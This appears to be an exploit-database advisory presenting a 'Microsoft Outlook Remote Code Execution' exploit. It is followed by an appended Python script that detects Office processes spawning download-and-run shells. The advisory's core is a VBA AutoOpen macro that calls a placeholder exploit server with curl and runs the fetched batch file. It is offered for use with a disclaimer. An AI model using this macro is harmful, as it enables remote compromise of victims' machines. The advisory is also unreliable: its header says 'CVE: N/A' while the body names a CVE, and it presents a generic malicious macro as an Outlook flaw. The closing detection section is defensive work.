Microsoft Outlook Remote Code Execution Vulnerability - CVE-2024-21413

2024.03.24
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Title: Microsoft Outlook Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 03/20/2024
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook
## Reference: https://www.bugcrowd.com/glossary/remote-code-execution-rce/
## CVE: CVE-2024-21413

## Description:
By sending a malicious .docm file to a victim who uses the Outlook mail app of 365, the attacker waits for the victim to click on it; the attacker's malicious code executes after the victim opens the file. After this action, the attacker can get control of some parts of the Windows services, steal sensitive information, and make a bot machine from the victim's PC.

STATUS: MEDIUM- Vulnerability

## Exploit:
The exploit can be deployed on a remote attacking server, as you can see on the second [video](https://youtu.be/zxrlV8lgoB0?si=YrTOR3wk_QLuABbd).
I am not responsible if someone breaks someone's system. You will respond IN FRONT OF THE LAW!

```
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s https://path_to_your_exploit_server.bat > PoC.bat && .\PoC.bat", vbNormalFocus)
End Sub
```

## Source:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2024/CVE-2024-21413)

## Proof and Exploit:
[href](https://www.youtube.com/watch?v=zxrlV8lgoB0)
[href](https://www.patreon.com/posts/microsoft-remote-100840891)

## Time spent:
01:17:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
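The macro above makes an Office process start `cmd.exe`, fetch a script with `curl` and run it, which is visible in process-creation telemetry. The following detection sketch is an added example, not part of the original advisory or the author's repository; the Sysmon-style field names, the constructed sample events, the `example.invalid` host, and the score weights and threshold are assumptions.

```python
import re
from ntpath import basename  # splits Windows paths correctly on any OS

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Traits of the macro's command line: a download tool, a remote URL, a script file.
DOWNLOADER = re.compile(r"curl|certutil|bitsadmin|invoke-webrequest", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
SCRIPT_FILE = re.compile(r"\.(bat|cmd|ps1|vbs)\b", re.I)

def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    parent = basename(ev.get("ParentImage", "")).lower()
    child = basename(ev.get("Image", "")).lower()
    cmdline = ev.get("CommandLine", "")
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return 0, []
    score, reasons = 1, [f"{parent} spawned {child}"]
    if DOWNLOADER.search(cmdline) and REMOTE_URL.search(cmdline):
        score += 2
        reasons.append("download tool with remote URL")
    if SCRIPT_FILE.search(cmdline):
        score += 2
        reasons.append("script file written or run")
    return score, reasons

def triage(events, threshold=3):
    """Return (event, score, reasons) at or above threshold, highest score first."""
    hits = [(ev, *score_event(ev)) for ev in events]
    return sorted((h for h in hits if h[1] >= threshold), key=lambda h: -h[1])

# Constructed sample events (not real telemetry); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /S /c curl -s https://example.invalid/a.bat > PoC.bat && .\PoC.bat"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl -s https://example.invalid/a.bat > a.bat"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 8192"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(score, "; ".join(reasons), "|", ev["CommandLine"])
```

An Office application spawning a shell scores 1 on its own, so the fourth event stays below the default threshold; lower the threshold to review every such parent-child pair.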

